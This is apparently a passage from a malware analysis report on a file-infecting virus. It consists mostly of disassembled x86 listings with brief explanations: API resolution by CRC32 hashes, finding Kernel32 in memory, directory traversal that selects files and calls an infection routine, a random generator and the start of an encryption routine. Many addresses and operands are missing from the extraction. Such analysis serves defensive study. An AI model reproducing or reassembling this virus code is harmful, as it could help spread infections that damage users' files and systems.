24 CODE:004018E0 pusha CODE:004018E1 push eax CODE:004018E1 CODE:004018E2 CODE:004018E2 CODE:004018E2 cmp RandomNumberState, 0 CODE:004018E9 jnz CODE:004018E9 CODE:004018EB or RandomNumberState, 0FFFFFFFFh CODE:004018F2 call genrand_int32 CODE:004018F2 CODE:004018F7 pop ecx CODE:004018F8 xor edx, edx CODE:004018FA div ecx CODE:004018FC mov [esp+20h+var_4], edx CODE: and RandomNumberState, 0 CODE: popa CODE: retn CODE: CODE: RandomNumber endp The previous code block returns a random range within a range. CODE: GetAPIsFromCRC32List proc near CODE: CODE: CODE: var_28 = dword ptr -28h CODE: var_24 = dword ptr -24h CODE: PA_EAX = dword ptr -4 CODE: ARG1 = dword ptr 4 CODE: ARG2 = dword ptr 8 CODE: ARG3 = dword ptr 0Ch CODE: ARG4 = dword ptr 10h CODE: CODE: pusha CODE: A or dword ptr [ebp+14h], 0FFFFFFFFh CODE: E mov ebx, [esp+20h+arg4] CODE: mov esi, [ebx+3ch] CODE: add esi, ebx CODE: mov esi, [esi+78h] CODE: A lea esi, [ebx+esi+18h] CODE: E lodsd CODE: F xchg eax, ecx CODE: inc ecx CODE: lodsd CODE: add eax, ebx CODE: push eax CODE: lodsd CODE: lea edi, [ebx+eax] CODE: mov edi, [edi] CODE: B add edi, ebx CODE: D lodsd CODE: E add eax, ebx CODE: push eax CODE:

25 CODE: CODE: CODE: CODE: dec ecx CODE: jecxz short CODE: CODE: xchg esi, edi CODE: inc dword ptr [ebp+14h] CODE: call GetCRC32OfString CODE: CODE: E mov edi, esi CODE: mov esi, [esp+28h+arg1] CODE: or edx, 0FFFFFFFFh CODE: CODE: CODE: CODE: inc edx CODE: lodsd CODE: test eax, eax CODE: B jz short CODE: B CODE: D cmp eax, ebx CODE: F jnz short CODE: F CODE: mov esi, [esp+28h+var_28] CODE: mov ebx, [ebp+14h] CODE: movzx ebx, word ptr [esi+ebx*2] CODE: B mov esi, [esp+28h+var_24] CODE: F mov ebx, [esi+ebx*4] CODE: add ebx, [esp+28h+arg4] CODE: mov eax, [esp+28h+arg2] CODE: A lea eax, [eax+edx*4] CODE: D mov [eax], ebx CODE: F jmp short CODE: F CODE: CODE: CODE: CODE: mov esi, [esp+28h+arg2] CODE: mov ecx, [esp+28h+arg3] CODE: CODE: CODE: CODE: lodsd CODE: A test eax, eax CODE: C jz short CODE: C CODE: E loop CODE: E CODE: CODE: CODE: add esp, 8 CODE: mov [esp+20h+pa_eax], eax CODE: popa CODE: retn 10h CODE: CODE: GetAPIsFromCRC32List endp

26 The previous code block retrieves pointers to several API s. The function will take require the pointer to the CRC32 list, pointer to a buffer where the API addresses will be saved, the number of imported API s and the Base Address. CODE: B GetCRC32OfString proc near CODE: B CODE: B push eax CODE: C push ecx CODE: D push edx CODE: E push edi CODE: F cld CODE: xor ecx, ecx CODE: dec ecx CODE: mov edx, ecx CODE: CODE: CODE: cmp byte ptr [esi], 0 CODE: jz CODE: CODE: A xor eax, eax CODE: C xor ebx, ebx CODE: E lodsb CODE: F xor al, cl CODE:004019A1 mov cl, ch CODE:004019A3 mov ch, dl CODE:004019A5 mov dl, dh CODE:004019A7 mov dh, 8 CODE:004019A7 CODE:004019A9 CODE:004019A9 shr bx, 1 CODE:004019AC rcr ax, 1 CODE:004019AF jnb CODE:004019AF CODE:004019B1 xor ax, 8320h CODE:004019B5 xor bx, 0EDB8h CODE:004019B5 CODE:004019BA CODE:004019BA dec dh CODE:004019BC jnz CODE:004019BC CODE:004019BE xor ecx, eax CODE:004019C0 xor edx, ebx CODE:004019C2 dec edi CODE:004019C3 jnz CODE:004019C3 CODE:004019C5 CODE:004019C5 not edx CODE:004019C7 not ecx CODE:004019C9 mov eax, edx

27 CODE:004019CB rol eax, 10h CODE:004019CE mov ax, cx CODE:004019D1 inc esi CODE:004019D2 xchg eax, ebx CODE:004019D3 pop edi CODE:004019D4 pop edx CODE:004019D5 pop ecx CODE:004019D6 pop eax CODE:004019D7 retn CODE:004019D7 CODE:004019D7 GetCRC32OfString endp The previous code block calculates the CRC32 of zero terminated string. The function expects a pointer to the ASCII string in ESI register. CODE:004019D8 GetKernel32Base proc near CODE:004019D8 push eax CODE:004019D9 push esi CODE:004019DA xor esi, esi CODE:004019DC mov esi, fs:[esi] CODE:004019DC CODE:004019DF CODE:004019DF mov eax, [esi] CODE:004019E1 inc eax CODE:004019E2 jz CODE:004019E2 CODE:004019E4 dec eax CODE:004019E5 xchg eax, esi CODE:004019E6 jmp CODE:004019E6 CODE:004019E8 CODE:004019E8 CODE:004019E8 mov eax, [esi+4] CODE:004019EB xor ax, ax CODE:004019EB CODE:004019EE CODE:004019EE cmp word ptr [eax], 5A4Dh CODE:004019F3 jz CODE:004019F3 CODE:004019F5 CODE:004019F5 sub eax, 10000h CODE:004019FA jmp CODE:004019FA CODE:004019FC CODE:004019FC CODE:004019FC mov [ebp+0], eax CODE:004019FF mov esi, [eax+3ch] CODE:00401A02 add esi, eax CODE:00401A04 cmp dword ptr [esi], 4550h CODE:00401A0A jnz

28 CODE:00401A0A CODE:00401A0C pop esi CODE:00401A0D pop eax CODE:00401A0E retn CODE:00401A0E CODE:00401A0E GetKernel32Base endp The previous code retrieves the Kernel32 location in memory. The function retrieves the Kernel32 location using SEH. CODE:00401A0F DirectoryTraversal proc near CODE:00401A0F CODE:00401A0F var_17c = dword ptr -17Ch CODE:00401A0F var_170 = dword ptr -170h CODE:00401A0F var_144 = dword ptr -144h CODE:00401A0F var_40 = dword ptr -40h CODE:00401A0F CODE:00401A0F pusha CODE:00401A10 push 0 CODE:00401A12 lea eax, DIR_Root+2 CODE:00401A18 push eax CODE:00401A19 mov al, 0Ch CODE:00401A1B call StealthAPI CODE:00401A1B CODE:00401A20 test eax, eax CODE:00401A22 CODE:00401A22 CODE:00401A28 CODE:00401A28 sub esp, 140h CODE:00401A2E push esp CODE:00401A2F lea eax, DIR_Wildcards CODE:00401A35 push eax CODE:00401A36 mov al, 16h CODE:00401A38 call StealthAPI CODE:00401A38 CODE:00401A3D push eax CODE:00401A3E inc eax CODE:00401A3F CODE:00401A3F CODE:00401A45 dec eax CODE:00401A45 CODE:00401A46 CODE:00401A46 lea ebx, [esp+174h+var_144] CODE:00401A4A test byte ptr [esp+174h+var_170], 10h CODE:00401A4F jz CODE:00401A4F CODE:00401A51 cmp byte ptr [ebx], '.' CODE:00401A54 jz CODE:00401A54 CODE:00401A56 push ebx CODE:00401A57 mov al, 0Ch CODE:00401A59 call StealthAPI CODE:00401A59

29 CODE:00401A5E jmp short CODE:00401A5E CODE:00401A60 ; CODE:00401A60 CODE:00401A60 lea esi, [esp+174h+var_170] CODE:00401A64 lea edi, [ebp+13ch] CODE:00401A6A mov ecx, 140h CODE:00401A6F rep movsb CODE:00401A71 push eax CODE:00401A72 lea esi, [ebp+168h] CODE:00401A78 call Uppercase CODE:00401A78 CODE:00401A7D call GetCRC32OfString CODE:00401A7D CODE:00401A82 lea esi, CRC32_Checksumfile_List CODE:00401A82 CODE:00401A88 CODE:00401A88 lodsd CODE:00401A89 xchg eax, ecx CODE:00401A8A jecxz CODE:00401A8A CODE:00401A8C cmp ebx, ecx CODE:00401A8E jnz CODE:00401A8E CODE:00401A90 lea esi, [ebp+168h] CODE:00401A96 push esi CODE:00401A97 push 80h CODE:00401A9C push esi CODE:00401A9D mov al, 11h CODE:00401A9F call StealthAPI CODE:00401A9F CODE:00401AA4 mov al, 15h CODE:00401AA6 call StealthAPI CODE:00401AA6 CODE:00401AAB pop eax CODE:00401AAC jmp CODE:00401AAC CODE:00401AAE CODE:00401AAE CODE:00401AAE pop eax CODE:00401AAF or dword ptr [ebp+280h], 0FFFFFFFFh CODE:00401AB6 call InfectFile CODE:00401AB6 CODE:00401ABB inc dword ptr [ebp+280h] CODE:00401AC1 jz CODE:00401AC1 CODE:00401AC3 dec dword ptr [ebp+27ch] CODE:00401AC9 jz CODE:00401AC9 CODE:00401ACB CODE:00401ACB CODE:00401ACB lea ebx, [esp+174h+var_170]

30 CODE:00401ACF push ebx CODE:00401AD0 push eax CODE:00401AD1 mov al, 17h CODE:00401AD3 call StealthAPI CODE:00401AD3 CODE:00401AD8 cmp ThreadExecution, 0FFFFFFFFh CODE:00401ADF jz short CODE:00401ADF CODE:00401AE1 test eax, eax CODE:00401AE3 mov eax, [esp+17ch+var_17c] CODE:00401AE6 jnz CODE:00401AE6 CODE:00401AEC CODE:00401AEC CODE:00401AEC push eax CODE:00401AED mov al, 18h CODE:00401AEF call StealthAPI CODE:00401AEF CODE:00401AF4 lea eax, DIR_Parent CODE:00401AFA push eax CODE:00401AFB mov al, 0Ch CODE:00401AFD call StealthAPI CODE:00401AFD CODE:00401B02 add esp, 144h CODE:00401B08 mov eax, [esp+40h+var_40] CODE:00401B0B test eax, eax CODE:00401B0D jnz short CODE:00401B0D CODE:00401B0F CODE:00401B0F CODE:00401B0F CODE:00401B0F add esp, 4 CODE:00401B12 popa CODE:00401B13 retn CODE:00401B13 CODE:00401B14 CODE:00401B14 CODE:00401B14 CODE:00401B14 mov esi, esp CODE:00401B16 lodsd CODE:00401B17 test eax, eax CODE:00401B19 jz CODE:00401B19 CODE:00401B1B mov al, 18h CODE:00401B1D call StealthAPI CODE:00401B1D CODE:00401B22 add esp, 140h CODE:00401B28 jmp CODE:00401B28 CODE:00401B28 DirectoryTraversal endp The previous code block traverses the directories looking for files to infect. CODE:00401B2A init_genrand proc near

31 CODE:00401B2A CODE:00401B2A ARG1 = dword ptr 4 CODE:00401B2A CODE:00401B2A pusha CODE:00401B2B lea edi, [ebp+304h] CODE:00401B31 xor ecx, ecx CODE:00401B33 mov eax, [esp+20h+arg1] CODE:00401B37 stosd CODE:00401B37 CODE:00401B38 CODE:00401B38 inc ecx CODE:00401B39 cmp ecx, 270h CODE:00401B3F jz CODE:00401B3F CODE:00401B41 mov edx, eax CODE:00401B43 shr edx, 1Eh CODE:00401B46 xor eax, edx CODE:00401B48 imul eax, 6C078965h CODE:00401B4E add eax, ecx CODE:00401B50 stosd CODE:00401B51 jmp CODE:00401B51 CODE:00401B53 CODE:00401B53 CODE:00401B53 mov [ebp+300h], ecx CODE:00401B59 popa CODE:00401B5A retn 4 CODE:00401B5A CODE:00401B5A init_genrand endp The previous code block initializes an array with a 32 bit seed. CODE:00401B5D init_by_array proc near CODE:00401B5D CODE:00401B5D var_24 = dword ptr -24h CODE:00401B5D arg_0 = dword ptr 4 CODE:00401B5D arg_4 = dword ptr 8 CODE:00401B5D CODE:00401B5D pusha CODE:00401B5E lea edi, [ebp+304h] CODE:00401B64 mov esi, [esp+20h+arg_0] CODE:00401B68 xor edx, edx CODE:00401B6A push edx CODE:00401B6B inc edx CODE:00401B6C mov eax, [esp+24h+arg_4] CODE:00401B70 mov ecx, 270h CODE:00401B75 cmp eax, ecx CODE:00401B77 jl CODE:00401B77 CODE:00401B79 mov ecx, eax CODE:00401B79 CODE:00401B7B

32 CODE:00401B7B push 12BD6AAh CODE:00401B80 call init_genrand CODE:00401B80 CODE:00401B85 CODE:00401B85 CODE:00401B85 mov eax, [edi+edx*4-4] CODE:00401B89 mov ebx, eax CODE:00401B8B shr eax, 1Eh CODE:00401B8E xor eax, ebx CODE:00401B90 imul eax, 19660Dh CODE:00401B96 xor eax, [edi+edx*4] CODE:00401B99 mov ebx, [esp+24h+var_24] CODE:00401B9C add eax, ebx CODE:00401B9E add eax, [esi+ebx*4] CODE:00401BA1 mov [edi+edx*4], eax CODE:00401BA4 inc edx CODE:00401BA5 inc [esp+24h+var_24] CODE:00401BA8 cmp edx, 270h CODE:00401BAE jl short CODE:00401BAE CODE:00401BB0 mov eax, [edi+edx*4-4] CODE:00401BB4 mov [edi], eax CODE:00401BB6 xor edx, edx CODE:00401BB8 inc edx CODE:00401BB8 CODE:00401BB9 CODE:00401BB9 CODE:00401BB9 mov ebx, [esp+24h+var_24] CODE:00401BBC cmp ebx, [esp+24h+arg_4] CODE:00401BC0 jl short CODE:00401BC0 CODE:00401BC2 and [esp+24h+var_24], 0 CODE:00401BC2 CODE:00401BC6 CODE:00401BC6 CODE:00401BC6 CODE:00401BC8 mov ecx, 26Fh CODE:00401BC8 CODE:00401BCD CODE:00401BCD mov eax, [edi+edx*4-4] CODE:00401BD1 mov ebx, eax CODE:00401BD3 shr eax, 1Eh CODE:00401BD6 xor eax, ebx CODE:00401BD8 imul eax, 5D588B65h CODE:00401BDE xor eax, [edi+edx*4] CODE:00401BE1 sub eax, edx CODE:00401BE3 mov [edi+edx*4], eax CODE:00401BE6 inc edx CODE:00401BE7 mov eax, 270h CODE:00401BEC cmp edx, eax CODE:00401BEE jl CODE:00401BEE CODE:00401BF0 mov eax, [edi+eax*4-4] CODE:00401BF4 mov [edi], eax CODE:00401BF6 xor edx, edx

33 CODE:00401BF8 inc edx CODE:00401BF8 CODE:00401BF9 CODE:00401BF9 CODE:00401BF9 loop CODE:00401BF9 CODE:00401BFB mov dword ptr [edi], h CODE:00401C01 pop eax CODE:00401C02 popa CODE:00401C03 retn 8 CODE:00401C03 CODE:00401C03 init_by_array endp The previous code block initializes an array with an array of 32 bit seeds. CODE:00401C06 genrand_int32 proc near CODE:00401C06 CODE:00401C06 lea edi, [ebp+304h] CODE:00401C0C lea esi, mag01 CODE:00401C12 mov edx, [ebp+300h] CODE:00401C18 cmp edx, 270h CODE:00401C1E jl CODE:00401C1E CODE:00401C20 xor ecx, ecx CODE:00401C20 CODE:00401C22 CODE:00401C22 cmp ecx, 0E3h CODE:00401C28 jz CODE:00401C28 CODE:00401C2A call proc00401cb4 CODE:00401C2A CODE:00401C2F xor eax, [edi+ecx*4+634h] CODE:00401C36 mov [edi+ecx*4], eax CODE:00401C39 inc ecx CODE:00401C3A jmp CODE:00401C3A CODE:00401C3C CODE:00401C3C CODE:00401C3C CODE:00401C3C cmp ecx, 26Fh CODE:00401C42 jz CODE:00401C42 CODE:00401C44 call proc00401cb4 CODE:00401C44 CODE:00401C49 xor eax, [edi+ecx*4-38ch] CODE:00401C50 mov [edi+ecx*4], eax CODE:00401C53 inc ecx CODE:00401C54 jmp CODE:00401C54 CODE:00401C56 CODE:00401C56 CODE:00401C56 mov eax, [edi]

34 CODE:00401C58 and eax, 7FFFFFFFh CODE:00401C5D mov ebx, [edi+9bch] CODE:00401C63 call sub_401cc0 CODE:00401C63 CODE:00401C68 xor eax, [edi+630h] CODE:00401C6E mov [edi+9bch], eax CODE:00401C74 and dword ptr [ebp+300h], 0 CODE:00401C74 CODE:00401C7B CODE:00401C7B mov ecx, [ebp+300h] CODE:00401C81 mov ebx, [edi+ecx*4] CODE:00401C84 inc dword ptr [ebp+300h] CODE:00401C8A mov edx, ebx CODE:00401C8C shr edx, 0Bh CODE:00401C8F xor ebx, edx CODE:00401C91 mov edx, ebx CODE:00401C93 shl edx, 7 CODE:00401C96 and edx, 9D2C5680h CODE:00401C9C xor ebx, edx CODE:00401C9E mov edx, ebx CODE:00401CA0 shl edx, 0Fh CODE:00401CA3 and edx, 0EFC60000h CODE:00401CA9 xor ebx, edx CODE:00401CAB mov edx, ebx CODE:00401CAD shr edx, 12h CODE:00401CB0 xor ebx, edx CODE:00401CB2 xchg eax, ebx CODE:00401CB3 retn CODE:00401CB3 CODE:00401CB3 genrand_int32 endp The previous code block generates a random number in the interval [0, 0ffffffffh]. CODE:00401D5B RDKE32Encrypt proc near CODE:00401D5B CODE:00401D5B arg_0 = dword ptr 4 CODE:00401D5B arg_4 = dword ptr 8 CODE:00401D5B arg_8 = dword ptr 0Ch CODE:00401D5B arg_c = dword ptr 10h CODE:00401D5B CODE:00401D5B pusha CODE:00401D5C mov edi, [esp+20h+arg_0] CODE:00401D60 mov ebx, [esp+20h+arg_4] CODE:00401D64 mov ecx, [esp+20h+arg_8] CODE:00401D68 mov eax, [esp+20h+arg_c] CODE:00401D6C push ebx CODE:00401D6D push ecx CODE:00401D6E push edi CODE:00401D6F call SHA1 CODE:00401D6F CODE:00401D74 call RandomNumber CODE:00401D74 CODE:00401D79 inc eax CODE:00401D7A xchg eax, edx